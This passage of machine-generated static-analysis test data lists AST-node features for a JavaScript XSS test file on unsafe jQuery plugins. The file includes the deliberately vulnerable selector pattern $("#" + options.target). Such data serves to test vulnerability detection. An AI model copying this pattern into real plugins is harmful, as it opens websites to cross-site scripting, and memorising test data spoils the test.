| functio ... / OK\\n\\t} | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:80:19:82:2 | functio ... / OK\\n\\t} | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:80:19:82:2 | functio ... / OK\\n\\t} | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:80:19:82:2 | return of function my_plugin | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:80:19:82:2 | return of function my_plugin | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:80:19:82:2 | return of function my_plugin | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:80:19:82:2 | return of function my_plugin | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:80:28:80:36 | my_plugin | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:80:28:80:36 | my_plugin | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:80:28:80:36 | my_plugin | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:80:28:80:36 | my_plugin | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:80:38:80:44 | options | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:80:38:80:44 | options | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:80:38:80:44 | options | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:80:38:80:44 | options | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:80:38:80:44 | options | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:80:38:80:44 | options | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:80:38:80:44 | options | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:80:38:80:44 | options | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:81:3:81:3 | $ | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:81:3:81:3 | $ | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:81:3:81:3 | $ | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:81:3:81:3 | $ | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:81:3:81:25 | $("#" + ... target) | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:81:3:81:25 | $("#" + ... target) | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:81:3:81:25 | $("#" + ... target) | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:81:3:81:25 | $("#" + ... target) | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:81:3:81:25 | exceptional return of $("#" + ... target) | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:81:3:81:25 | exceptional return of $("#" + ... target) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:81:3:81:25 | exceptional return of $("#" + ... target) | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:81:3:81:25 | exceptional return of $("#" + ... target) | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:81:5:81:7 | "#" | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:81:5:81:7 | "#" | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:81:5:81:7 | "#" | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:81:5:81:7 | "#" | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:81:5:81:7 | "#" | stringConcatenatedWith | -endpoint- options.target | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:81:5:81:24 | "#" + options.target | CalleeFlexibleAccessPath | $ | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:81:5:81:24 | "#" + options.target | InputArgumentIndex | 0 | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:81:5:81:24 | "#" + options.target | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:81:5:81:24 | "#" + options.target | contextSurroundingFunctionParameters | ()\n(options) | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:81:5:81:24 | "#" + options.target | enclosingFunctionName | | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:81:5:81:24 | "#" + options.target | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:81:11:81:17 | options | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:81:11:81:17 | options | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:81:11:81:17 | options | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:81:11:81:17 | options | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:81:11:81:24 | options.target | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:81:11:81:24 | options.target | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:81:11:81:24 | options.target | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:81:11:81:24 | options.target | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:81:11:81:24 | options.target | stringConcatenatedWith | '#' -endpoint- | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:81:19:81:24 | target | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:81:19:81:24 | target | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:81:19:81:24 | target | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:81:19:81:24 | target | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:84:2:84:2 | $ | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:84:2:84:2 | $ | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:84:2:84:2 | $ | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:84:2:84:2 | $ | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:84:2:84:5 | $.fn | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:84:2:84:5 | $.fn | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:84:2:84:5 | $.fn | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:84:2:84:5 | $.fn | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:84:2:84:15 | $.fn.my_plugin | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:84:2:84:15 | $.fn.my_plugin | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:84:2:84:15 | $.fn.my_plugin | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:84:2:84:15 | $.fn.my_plugin | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:84:2:93:2 | $.fn.my ... ns);\\n\\t} | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:84:2:93:2 | $.fn.my ... ns);\\n\\t} | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:84:2:93:2 | $.fn.my ... ns);\\n\\t} | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:84:2:93:2 | $.fn.my ... ns);\\n\\t} | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:84:4:84:5 | fn | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:84:4:84:5 | fn | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:84:4:84:5 | fn | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:84:4:84:5 | fn | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:84:7:84:15 | my_plugin | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:84:7:84:15 | my_plugin | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:84:7:84:15 | my_plugin | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:84:7:84:15 | my_plugin | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:84:19:84:18 | this | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:84:19:84:18 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:84:19:84:18 | this | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:84:19:84:18 | this | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:84:19:93:2 | 'arguments' object of function my_plugin | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:84:19:93:2 | 'arguments' object of function my_plugin | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:84:19:93:2 | 'arguments' object of function my_plugin | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:84:19:93:2 | 'arguments' object of function my_plugin | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:84:19:93:2 | exceptional return of function my_plugin | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:84:19:93:2 | exceptional return of function my_plugin | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:84:19:93:2 | exceptional return of function my_plugin | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:84:19:93:2 | exceptional return of function my_plugin | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:84:19:93:2 | functio ... ns);\\n\\t} | assignedToPropName | my_plugin | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:84:19:93:2 | functio ... ns);\\n\\t} | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:84:19:93:2 | functio ... ns);\\n\\t} | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:84:19:93:2 | functio ... ns);\\n\\t} | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:84:19:93:2 | functio ... ns);\\n\\t} | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:84:19:93:2 | return of function my_plugin | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:84:19:93:2 | return of function my_plugin | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:84:19:93:2 | return of function my_plugin | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:84:19:93:2 | return of function my_plugin | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:84:28:84:36 | my_plugin | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:84:28:84:36 | my_plugin | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:84:28:84:36 | my_plugin | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:84:28:84:36 | my_plugin | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:84:38:84:44 | options | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:84:38:84:44 | options | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:84:38:84:44 | options | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:84:38:84:44 | options | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:84:38:84:44 | options | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:84:38:84:44 | options | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:84:38:84:44 | options | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:84:38:84:44 | options | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:85:3:85:2 | this | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:85:3:85:2 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:85:3:85:2 | this | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:85:3:85:2 | this | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:85:3:91:3 | 'arguments' object of function f | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:85:3:91:3 | 'arguments' object of function f | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:85:3:91:3 | 'arguments' object of function f | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:85:3:91:3 | 'arguments' object of function f | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:85:3:91:3 | exceptional return of function f | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:85:3:91:3 | exceptional return of function f | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:85:3:91:3 | exceptional return of function f | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:85:3:91:3 | exceptional return of function f | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:85:3:91:3 | functio ... OK\\n\\t\\t} | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, 